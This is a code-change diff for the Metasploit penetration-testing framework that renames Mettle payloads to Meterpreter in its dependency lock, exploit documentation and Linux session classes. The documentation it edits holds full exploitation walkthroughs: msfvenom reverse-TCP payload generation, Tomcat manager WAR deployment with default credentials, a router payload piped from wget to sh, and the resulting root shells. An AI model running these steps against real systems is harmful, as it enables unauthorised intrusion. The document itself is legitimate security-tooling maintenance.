Land rapid7#8279, POSIX Meterpreter replaced by Mettle

Author: wvu

Gemfile.lock

@@ -46,7 +46,7 @@ PATH
       metasploit-model
       metasploit-payloads (= 1.2.24)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.8)
+      metasploit_payloads-mettle (= 0.1.9)
       msgpack
       nessus_rest
       net-ssh
@@ -233,7 +233,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.8)
+    metasploit_payloads-mettle (0.1.9)
     mime-types (3.1)
       mime-types-data (~> 3.2015)
     mime-types-data (3.2016.0521)

documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md

@@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access.
 
 With an attacker node that resides within the ISP network, do:
 
-- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
+- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp`
 
 - Set `RHOST` to the target router's IP
 
@@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate
 the payload ELF executable using `msfvenom`:
 
 ```
-$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
+$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
 
 No encoder or badchars specified, outputting raw payload
 Payload size: 212 bytes

documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md

@@ -17,34 +17,34 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
 ## Options
 
   **PAYLOAD**
-  
-  The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
+
+  The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
 
 ## Scenarios
 
   Sample output of a successful session:
-  
+
   ```
   msf exploit(netgear_r7000_cgibin_exec) > run
 
-[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Started reverse TCP handler on 127.0.0.1:4444
 [*] Router is a NETGEAR router (R7000)
 [+] Router may be vulnerable (NETGEAR R7000)
 [*] Using URL: http://0.0.0.0:8080/
 [*] Local IP: http://[redacted]:8080/
 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600
 [*] Server stopped.
 
-meterpreter > getuid 
+meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
-meterpreter > sysinfo 
+meterpreter > sysinfo
 Computer     : 192.168.1.4
 OS           :  (Linux 2.6.36.4brcmarm+)
 Architecture : armv7l
 Meterpreter  : armle/linux
-meterpreter > 
+meterpreter >
   ```
-  
+
   As you can see, the `uid` is 0, meaning you have root access.
-  
-  
+
+

documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md

@@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`.
 3. Exploit:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
     rhost => 192.168.2.108
     msf exploit(tomcat_mgr_deploy) > set verbose true
@@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`.
     HttpUsername => tomcat
     msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
     lhost => 192.168.2.117
-    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
     payload => java/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set target 1
     target => 1
@@ -54,21 +54,21 @@ For this exploitation, it was changed to simply `manager`.
     msf exploit(tomcat_mgr_deploy) > check
     [*] 192.168.2.108:8086 The target appears to be vulnerable.
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Java Universal"
     [*] Uploading 6071 bytes as scEYoK0.war ...
     [!] No active DB -- Credential data will not be saved!
     [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
     [*] Undeploying scEYoK0 ...
     [*] Sending stage (49409 bytes) to 192.168.2.108
     [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
-    
+
     meterpreter > sysinfo
     Computer    : winxp
     OS          : Windows XP 5.1 (x86)
     Meterpreter : java/windows
-    
+
     ```
 
 ### Tomcat 7 (7.0.73)
@@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default.
 3. Exploitation:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
     rhost => 192.168.2.108
     msf exploit(tomcat_mgr_deploy) > set path /manager/text
@@ -111,23 +111,23 @@ Of note, the user was given `manager-gui` permissions by default.
     lhost => 192.168.2.117
     msf exploit(tomcat_mgr_deploy) > set rport 8087
     rport => 8087
-    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
     payload => java/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set target 1
     target => 1
     msf exploit(tomcat_mgr_deploy) > check
     [*] 192.168.2.108:8087 The target appears to be vulnerable.
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Java Universal"
     [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
     [!] No active DB -- Credential data will not be saved!
     [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
     [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
     [*] Sending stage (49409 bytes) to 192.168.2.108
     [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
-    
+
     meterpreter > sysinfo
     Computer    : winxp
     OS          : Windows XP 5.1 (x86)
@@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default.
 3. Exploitation:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
     rhost => 192.168.2.108
     msf exploit(tomcat_mgr_deploy) > set rport 8088
     rport => 8088
-    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
     payload => java/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
     lhost => 192.168.2.117
@@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default.
     msf exploit(tomcat_mgr_deploy) > set path /manager/text
     path => /manager/text
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Java Universal"
     [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
     [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
     [*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
     [*] Sending stage (49409 bytes) to 192.168.2.108
     [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
-    
+
     meterpreter > sysinfo
     Computer    : winxp
     OS          : Windows XP 5.1 (x86)
@@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default.
 3. Exploit:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
     rhost => 192.168.2.156
     msf exploit(tomcat_mgr_deploy) > set rport 8080
@@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default.
     HttpUsername => tomcat
     msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
     HttpPassword => tomcat
-    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
+    payload => linux/x86/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
     lhost => 192.168.2.117
     msf exploit(tomcat_mgr_deploy) > set target 3
     target => 3
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Linux x86"
     [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
     [!] No active DB -- Credential data will not be saved!
@@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default.
     [*] Sending stage (335800 bytes) to 192.168.2.156
     [*] Undeploying 9bj4IYa66cSpdK ...
     [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
-    
+
     meterpreter > sysinfo
     Computer     : Ubuntu14.04
     OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
@@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
 3. Exploit:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
     rhost => 192.168.2.118
     msf exploit(tomcat_mgr_deploy) > set rport 8087
     rport => 8087
     msf exploit(tomcat_mgr_deploy) > set target 3
     target => 3
-    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
+    payload => linux/x86/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
     lhost => 192.168.2.117
     msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
     msf exploit(tomcat_mgr_deploy) > set path /manager/text
     path => /manager/text
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Linux x86"
     [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
     [!] No active DB -- Credential data will not be saved!
@@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
     [*] Transmitting intermediate stager...(106 bytes)
     [*] Sending stage (335800 bytes) to 192.168.2.118
     [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
-    
+
     meterpreter > sysinfo
     Computer     : 192.168.2.118
     OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
@@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
 3. Exploit:
 
     ```
-    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf > use exploit/multi/http/tomcat_mgr_deploy
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
     rhost => 192.168.2.118
     msf exploit(tomcat_mgr_deploy) > set rport 8088
     rport => 8088
     msf exploit(tomcat_mgr_deploy) > set target 3
     target => 3
-    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
+    payload => linux/x86/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
     lhost => 192.168.2.117
     msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
     msf exploit(tomcat_mgr_deploy) > set path /manager/text
     path => /manager/text
     msf exploit(tomcat_mgr_deploy) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
+
+    [*] Started reverse TCP handler on 192.168.2.117:4444
     [*] Using manually select target "Linux x86"
     [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
     [!] No active DB -- Credential data will not be saved!
@@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
     [*] Transmitting intermediate stager...(106 bytes)
     [*] Sending stage (335800 bytes) to 192.168.2.118
     [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
-    
+
     meterpreter > sysinfo
     Computer     : 192.168.2.118
     OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)

documentation/modules/exploit/multi/local/allwinner_backdoor.md

@@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true
 verbose => true
 msf exploit(allwinner_backdoor) > set session 1
 session => 1
-msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
-payload => linux/armle/mettle/reverse_tcp
+msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
+payload => linux/armle/meterpreter/reverse_tcp
 msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
 lhost => 192.168.2.117
 msf exploit(allwinner_backdoor) > check
@@ -50,7 +50,7 @@ msf exploit(allwinner_backdoor) > exploit
 ## Successful exploitation:
 
 ```
-[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Started reverse TCP handler on 192.168.2.117:4444
 [*] Transmitting intermediate stager...(136 bytes)
 [*] Sending stage (374540 bytes) to 192.168.2.248
 [+] Backdoor Found, writing payload to /tmp/odzVx.elf
@@ -68,4 +68,4 @@ Computer     : 192.168.2.248
 OS           : Ubuntu 14.04 (Linux 3.4.39)
 Architecture : armv7l
 Meterpreter  : armle/linux
-```
+```

lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb renamed to lib/msf/base/sessions/meterpreter_x64_linux.rb

@@ -10,7 +10,7 @@ module Sessions
 # This class creates a platform-specific meterpreter session type
 #
 ###
-class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
+class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter
   def supports_ssl?
     false
   end

lib/msf/base/sessions/meterpreter_x86_linux.rb

@@ -11,6 +11,12 @@ module Sessions
 #
 ###
 class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
   def initialize(rstream, opts={})
     super
     self.base_platform = 'linux'